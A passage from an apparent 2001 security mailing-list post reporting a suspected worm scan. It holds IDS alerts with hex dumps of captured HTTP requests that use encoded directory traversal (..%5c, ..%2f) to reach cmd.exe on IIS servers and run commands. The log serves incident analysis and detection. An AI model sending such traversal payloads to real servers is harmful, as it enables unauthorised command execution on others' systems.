hlen=5 TOS=0 dlen=140 ID=7227 flags=0 offset=0 TTL=123 chksum=63598
TCP: port=3206 -> dport: 80 flags=***AP*** seq=1772532327
ack=741934640 off=5 res=0 win=65535 urp=0 chksum=50606
Payload: length = 94
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
010 : 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 5c../winnt/syste
020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 m32/cmd.exe?/c+d
030 : 69 72 20 63 2B 64 69 72 20 48 54 54 50 2F 31 2E ir c+dir HTTP/1.
040 : 30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 0..Host: www..Co
050 : 6E 6E 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F nnnection: clo
----------------------------------------------------------------------------
--
#(2 - 23457) [2001-09-18 09:01:46] spp_unidecode: Unicode Directory
Transversal attack detected
IPv4: 65.29.45.70 -> 65.29.59.66
hlen=5 TOS=0 dlen=136 ID=7250 flags=0 offset=0 TTL=123 chksum=63579
TCP: port=3214 -> dport: 80 flags=***AP*** seq=1772999286
ack=741934650 off=5 res=0 win=65535 urp=0 chksum=944
Payload: length = 94
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
010 : 32 66 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 2f../winnt/syste
020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 m32/cmd.exe?/c+d
030 : 69 72 20 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48 ir r HTTP/1.0..H
040 : 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65 ost: www..Connne
050 : 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A ction: close..
----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com
Current thread:
- Interesting Scan--Looks like a new worm. Steve Halligan (Sep 18)